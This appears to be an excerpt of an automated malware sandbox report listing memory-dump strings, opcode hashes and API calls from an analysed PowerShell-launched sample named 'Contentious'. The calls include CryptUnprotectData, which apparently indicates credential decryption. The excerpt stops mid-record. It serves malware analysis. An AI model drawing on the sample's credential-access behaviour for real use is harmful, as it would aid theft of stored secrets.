                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: _$$^q$$^q$$^q
                                            • API String ID: 0-2892113873

                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:7.6%
                                            Total number of Nodes:92
                                            Total number of Limit Nodes:6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                            • API String ID: 0-2525668591
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N
                                            • API String ID: 0-1130791706
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$4'^q
                                            • API String ID: 0-273632683
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$Hbq
                                            • API String ID: 0-662517225

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 036bd9411ed3a05b3aa9f74734e62392ab1b819253669a14045aaaf1ebbee61a
                                            • Instruction ID: 2cdd1980b7deef28ddd306b99c1118f95dc06b9186a17c01842abcd2d0ea5255
                                            • Opcode Fuzzy Hash: 036bd9411ed3a05b3aa9f74734e62392ab1b819253669a14045aaaf1ebbee61a
                                            • Instruction Fuzzy Hash: C081C574E00218CFDB58DFAAD894A9DBBF2BF89301F14C069E819AB365DB349945CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$PH^q
                                            • API String ID: 0-1598597984
                                            • Opcode ID: 913240fe90f2ee512917042caca4c48ee9c6172297b236fed87c963ac7432a3e
                                            • Instruction ID: ce2b597aca092640db6e5f779f3c450778f512631c00db342ab86942282eb232
                                            • Opcode Fuzzy Hash: 913240fe90f2ee512917042caca4c48ee9c6172297b236fed87c963ac7432a3e
                                            • Instruction Fuzzy Hash: 3181B574E00218CFDB18DFAAD994A9DBBF2BF89301F14C06AE819AB365DB345945CF50
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 238299AD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: 4cb8e1ed969cbddcdeb91e461920957b13ca405aee8053d11f67997e266e4898
                                            • Instruction ID: f17757b4a4628def6b882220b63003fb20c1162c623770b2c4a66f7640e23fa8
                                            • Opcode Fuzzy Hash: 4cb8e1ed969cbddcdeb91e461920957b13ca405aee8053d11f67997e266e4898
                                            • Instruction Fuzzy Hash: 3A1156B2800349DFCB10DF9AC945BDEBFF4EB48320F148459EA18A7210C335A9A0DFA5
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 238299AD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: 474b6b3f5a097b75ab1319c3f311e3e22a551201ad8fe8c90b8b9cccae4e0d31
                                            • Instruction ID: 90526275bec587f8332f9272a09f1155d4f326634793e7db3ab78aea013d299b
                                            • Opcode Fuzzy Hash: 474b6b3f5a097b75ab1319c3f311e3e22a551201ad8fe8c90b8b9cccae4e0d31
                                            • Instruction Fuzzy Hash: C01156B2800349DFCB10DF99C845BDEBFF4EB48320F148419EA58A7210C375A690DFA5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7986511360bb549f87bebb2db34538b054c7e192ca59d28464b35af78dc7479
                                            • Instruction ID: 2c819760caffb001eb0d6f99dd9561d419b28d1c2cba0258f59bca28d7d623f3
                                            • Opcode Fuzzy Hash: e7986511360bb549f87bebb2db34538b054c7e192ca59d28464b35af78dc7479
                                            • Instruction Fuzzy Hash: 76222DB4E012188FDB14DFA9C994B9DBBF2BF88304F1086A9D809AB355DB359D85CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed668cbc1e6b6f80e04ce08e8eadd8dd65422beef1392b4ae325773e49a13a0
                                            • Instruction ID: 346655ef013406d3a85af0dc92ff1e204bfe6a4f83458d5bb36bfd2368458fe0
                                            • Opcode Fuzzy Hash: 1ed668cbc1e6b6f80e04ce08e8eadd8dd65422beef1392b4ae325773e49a13a0
                                            • Instruction Fuzzy Hash: 11E1CFB4E01218CFEB14DFA5C954B9DBBF2BF89305F2081A9D809AB395DB355A85CF10
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 076e1a985258baef014e78a8a952003c45e0b826fbc11fd64d25f5f57d3dec20
                                            • Instruction ID: 7b19cf96e72b715c26710abb853ae9f22307c50b6b3228a753a96a8676860d62
                                            • Opcode Fuzzy Hash: 076e1a985258baef014e78a8a952003c45e0b826fbc11fd64d25f5f57d3dec20
                                            • Instruction Fuzzy Hash: 06D1BF74E00218CFDB14DFA5C954BADBBF2BF88305F2081A9D819AB365DB355A86CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7893245f69c17445bdf82c8e9f17031f30a92dcc4630fda8eeb33dedaf22b6e2
                                            • Instruction ID: 7ef0c9fa3f948466b00d41877ff26427ca57b3cd0a60c3dbfc7dd5a73d9bb7ae
                                            • Opcode Fuzzy Hash: 7893245f69c17445bdf82c8e9f17031f30a92dcc4630fda8eeb33dedaf22b6e2
                                            • Instruction Fuzzy Hash: D9C19C74E00218CFDB14DFA5D994B9DBBF2BB89305F2080A9D819AB365DB359A81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac973b9d51172be48200fdfe3f2bf16491cb98aa9ad6234eee0c78f22314c765
                                            • Instruction ID: ac6ca493728844386607601a36aa6fa0e3ddd6f2d65f66e1b08a200f69d64590
                                            • Opcode Fuzzy Hash: ac973b9d51172be48200fdfe3f2bf16491cb98aa9ad6234eee0c78f22314c765
                                            • Instruction Fuzzy Hash: 0AC1A1B4E01218CFDB14DFA5C994B9DBBF2AF89305F2081A9D809AB365DB355E81CF50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 365d8b581470262b65bfc7d98e96dfd58f86a4fc5abf8a7a3e51443489611fb0
                                            • Instruction ID: 6c6d254dce637b1d16349eccf1eec42283b817909db6caf7536e7d5ed4cdc3d4
                                            • Opcode Fuzzy Hash: 365d8b581470262b65bfc7d98e96dfd58f86a4fc5abf8a7a3e51443489611fb0
                                            • Instruction Fuzzy Hash: 40A1E470D002188FEB14DFA9C994BDDBBF1BF89300F209269E419AB3A1DB759985CF51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 494f01f93a354fd92332a67d71efef84f15fc85862d52f3fc2a65096c8fff846
                                            • Instruction ID: 9ea1f6bec034a51e61451ce569bbbe240315542d19c00edb491808b2b1e3d0b1
                                            • Opcode Fuzzy Hash: 494f01f93a354fd92332a67d71efef84f15fc85862d52f3fc2a65096c8fff846
                                            • Instruction Fuzzy Hash: 1EA1F3B0D00218CFEB14DFA9C954B9DBBF1BF89310F208269E418AB3A1DB749985CF51
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d93fa5b540e342dbe54ce073c0038848395ef513e663ee573ea2472b166c400b
                                            • Instruction ID: 7e20723319a93a8449564e0d1be30fc06bbae3d8e233d9148e22721cc17f93ec
                                            • Opcode Fuzzy Hash: d93fa5b540e342dbe54ce073c0038848395ef513e663ee573ea2472b166c400b
                                            • Instruction Fuzzy Hash: 1591E2B0900218CFDB10DFA9C984BDDBBF1BF89310F209269E419AB3A1DB759985CF55
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af8fda0ddf15e8842687c31159f276556de5507206054d1b4a7ed6c7d2c4148d
                                            • Instruction ID: 7af7b644701db7c1a5266cf847d5bea5371e37f6c37254dca21f225fb97fc90c
                                            • Opcode Fuzzy Hash: af8fda0ddf15e8842687c31159f276556de5507206054d1b4a7ed6c7d2c4148d
                                            • Instruction Fuzzy Hash: 1E41D2B4D01648CFEB18CFEAD85469DBBF2AF89300F24C16AD419AB265DB344946CF00

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 20424FEE
                                            • GetCurrentThread.KERNEL32 ref: 2042502B
                                            • GetCurrentProcess.KERNEL32 ref: 20425068
                                            • GetCurrentThreadId.KERNEL32 ref: 204250C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: ,NM $,iM
                                            • API String ID: 2063062207-2075253796
                                            • Opcode ID: 625408b14f5f9b76904e9040b6c9b47e284ec1069cb62a4fbc5f390d4d883524
                                            • Instruction ID: 64bb9fc8c2c900e20c041a809af7991f464f024de7d9f81b40e3e2ae7cf6663c
                                            • Opcode Fuzzy Hash: 625408b14f5f9b76904e9040b6c9b47e284ec1069cb62a4fbc5f390d4d883524
                                            • Instruction Fuzzy Hash: E35157B0A007498FDB14DFA9D988B9EBBF1EF88310F20C559E419A7360DB785944CF65

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 20424FEE
                                            • GetCurrentThread.KERNEL32 ref: 2042502B
                                            • GetCurrentProcess.KERNEL32 ref: 20425068
                                            • GetCurrentThreadId.KERNEL32 ref: 204250C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: ,NM $,iM
                                            • API String ID: 2063062207-2075253796
                                            • Opcode ID: 70eb80dc4bab4e94dd5989af80d558879523202a6892780e7ece1793b72f187c
                                            • Instruction ID: 942218f0a49b39ed092beeb4e7601a7825e473cf3262260308dd15fe7d26f8aa
                                            • Opcode Fuzzy Hash: 70eb80dc4bab4e94dd5989af80d558879523202a6892780e7ece1793b72f187c
                                            • Instruction Fuzzy Hash: 7D5168B0A007498FDB14DFA9D988B9EBBF1EF88310F20C559E419A7360DB785940CF65

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                            • API String ID: 0-1932283790
                                            • Opcode ID: 4bf28f65c6640cd583edc9a4937a6c024db9d42335f3cb16e1303a04dd5782c6
                                            • Instruction ID: 5f0cf5e85a2f1897c01bd526a028013add436b61515594d4c84dd11cc0aff6b2
                                            • Opcode Fuzzy Hash: 4bf28f65c6640cd583edc9a4937a6c024db9d42335f3cb16e1303a04dd5782c6
                                            • Instruction Fuzzy Hash: E0126B30A04218CFCB14CF69D895AAEBBF2FF49316F158559E829DB2A1DB30ED45CB50

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Hbq$Hbq$Hbq
                                            • API String ID: 0-580995494
                                            • Opcode ID: e48f61a33321108fe28710f3ec15587018df5c74aabd7305b1681f97c99716c9
                                            • Instruction ID: 603e4f3c6c56e30cf3948ef5d057a4bb15ec73a7c02f001e37f20b0788db1d11
                                            • Opcode Fuzzy Hash: e48f61a33321108fe28710f3ec15587018df5c74aabd7305b1681f97c99716c9
                                            • Instruction Fuzzy Hash: 2481E8747002449FCF155FB8985866E3AA2AFC5361F604629FD26DB3E2CF358E82CB51

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$;^q
                                            • API String ID: 0-799016360
                                            • Opcode ID: b777e197e036604791428661e70805ccc5464ffe68a8287f2941e236c8e0bab5
                                            • Instruction ID: a036f6a1d78c48e4ad2a50c6135c66b9a4fc3ae9739a7c4f60ec955dccd33b79
                                            • Opcode Fuzzy Hash: b777e197e036604791428661e70805ccc5464ffe68a8287f2941e236c8e0bab5
                                            • Instruction Fuzzy Hash: F2F18E70304201CFDB199B39C854B3977EAAF85706F1944AAE826EF3A1EF65CC89C751

                                            Control-flow Graph (executed / not-executed block colouring; block edge list omitted): entry block 1577f0, basic blocks 1577f0-158391, call to 1587e9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q
                                            • API String ID: 0-355816377
                                            • Opcode ID: d7483f008fea2b8a50ffc005030ef4c79dea304e8ef2b2e61d64b0111ff9f252
                                            • Instruction ID: d3e7aadd0dd4b5bce0935b4ce763a9226a9ef638843e69de91c934fc999035bc
                                            • Opcode Fuzzy Hash: d7483f008fea2b8a50ffc005030ef4c79dea304e8ef2b2e61d64b0111ff9f252
                                            • Instruction Fuzzy Hash: 69523174A04218CFEB649BA4C860BAEBBB2FF44301F1081A9D50A7B795DF345E85DF91

                                            Control-flow Graph (executed / not-executed block colouring; block edge list omitted): entry block 1556a8, basic blocks 1556a8-155a5c, calls to 155698, 1556a8 (recursive), 156108, 155a68, 155a70, 15a650, 15a70d, 23821bc1, 23821bd0, 23821ca1, 23821f71, 23821f80, 23822188
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$Hbq
                                            • API String ID: 0-4258043069
                                            • Opcode ID: fc203e62944c27c0766eb15610af93af547e20619c604abb8720d1b872bd6c21
                                            • Instruction ID: bf59f0ae399a4d06a5d6d5cffd3fdad882abb38ab97a8532f89c4bff5acce911
                                            • Opcode Fuzzy Hash: fc203e62944c27c0766eb15610af93af547e20619c604abb8720d1b872bd6c21
                                            • Instruction Fuzzy Hash: DCB1BB30704650CFCB159B79C8A4B2E7BA3AF88316F158569E86ACF291DB34CC85DB91

                                            Control-flow Graph (executed / not-executed block colouring; block edge list omitted): entry block 155c08, basic blocks 155c08-155ea6, no calls
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq$,bq
                                            • API String ID: 0-2699258169
                                            • Opcode ID: 39d294b844b3606d4df5473b3e38216d548843ec1b346faa47a118ae4b4bd89f
                                            • Instruction ID: e7446bf1d8229dcf0c779a4733882397737f5b6a90676a76277d508cccd787cb
                                            • Opcode Fuzzy Hash: 39d294b844b3606d4df5473b3e38216d548843ec1b346faa47a118ae4b4bd89f
                                            • Instruction Fuzzy Hash: 97818035A00A05CFCB18CFA9C8A89A9B7B3FF89312B258169D825DF361D731ED45CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: 31e0825464d9cf85685d0eeba1745402c917f9c29589b74408be91daf0bac7c1
                                            • Instruction ID: d8e98a0dfd809b3de8514b5ec5c27a37678e87abdbd4a5406e0af265ccf0391a
                                            • Opcode Fuzzy Hash: 31e0825464d9cf85685d0eeba1745402c917f9c29589b74408be91daf0bac7c1
                                            • Instruction Fuzzy Hash: CD514C75A002148FCB05DBA8C494EDEBBB6EF88320F155194E505EB3A5CB71DD45CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xbq$Xbq
                                            • API String ID: 0-1243427068
                                            • Opcode ID: 3f3fd1017d055756772e3ac6e718f6a91e367f5661ae9f59d6f4a990d40400d0
                                            • Instruction ID: 81087b556c811570187ac1b09fb3f251c5eea4ce58858994a889f166b3d7606e
                                            • Opcode Fuzzy Hash: 3f3fd1017d055756772e3ac6e718f6a91e367f5661ae9f59d6f4a990d40400d0
                                            • Instruction Fuzzy Hash: 8131C671710324CBDF1D4A6A899427EA5D6ABC4392F144439DC36CB380DF74CE499761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: 220b85a1dd969f93e7898a0f7c880a9aa094056489dc40bf173723c10f6060df
                                            • Instruction ID: 744614e3b087bc399eebb1cc4e1dff27a559af8e0d2eaddb9645950e385667be
                                            • Opcode Fuzzy Hash: 220b85a1dd969f93e7898a0f7c880a9aa094056489dc40bf173723c10f6060df
                                            • Instruction Fuzzy Hash: 19311875B001188FCB05DFA8C490E9EBBF2EF98321F155594E505AB3A6CB31ED85CBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8cq$TJcq
                                            • API String ID: 0-1920894394
                                            • Opcode ID: ea03a0fe8b347270e441f12c87b36dba39f1976c9ec581949ec25c5bf6bac7f5
                                            • Instruction ID: f5f99ee709a96b60e8d0f18b623e3f44f0a5a1b677a0c3f78bb38974d7179b75
                                            • Opcode Fuzzy Hash: ea03a0fe8b347270e441f12c87b36dba39f1976c9ec581949ec25c5bf6bac7f5
                                            • Instruction Fuzzy Hash: D6311875B001188FCB45DFA8C490E9EBBF2EF98321F155594E505AF3A6CB31ED858BA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: c4abd685cbfc12bda015716e2d8935a1e4886658ea8b851d320637629a351241
                                            • Instruction ID: cef8fddccd2f7368075f0d4e5784531fff6995fa305ac59a1675820eed60b874
                                            • Opcode Fuzzy Hash: c4abd685cbfc12bda015716e2d8935a1e4886658ea8b851d320637629a351241
                                            • Instruction Fuzzy Hash: 9B22C17494021ACFCB54DF64DC98B9DBBB2FB89302F1085A9D80AA7365DB346E85CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: 10a16b57f4535b747dd3ddefbb285289663de6af3102ab480389af50a30f3947
                                            • Instruction ID: 264427963e33422b2dd23ceb540f933ce7ad814fc057f38d80535510e4d37fc0
                                            • Opcode Fuzzy Hash: 10a16b57f4535b747dd3ddefbb285289663de6af3102ab480389af50a30f3947
                                            • Instruction Fuzzy Hash: 3622A17494061ACFCB54DF64DC98B9DBBB2FB88312F1085A9D80AA7364DB346E95CF40
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2042FB62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: b9d913b276a089f5ca8b3b8702fa03aa7a6f721e130e938d79cd2130b1676642
                                            • Instruction ID: 001cac7ddd18b2a8d5cab31fcfdf8d441cb21e84aacc85cd93d5a76afe995775
                                            • Opcode Fuzzy Hash: b9d913b276a089f5ca8b3b8702fa03aa7a6f721e130e938d79cd2130b1676642
                                            • Instruction Fuzzy Hash: 9E41AEB1D003099FDB14CFA9D994ADEBFB5FF48314F64822AE818AB210D774A945CF91
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 205123B1
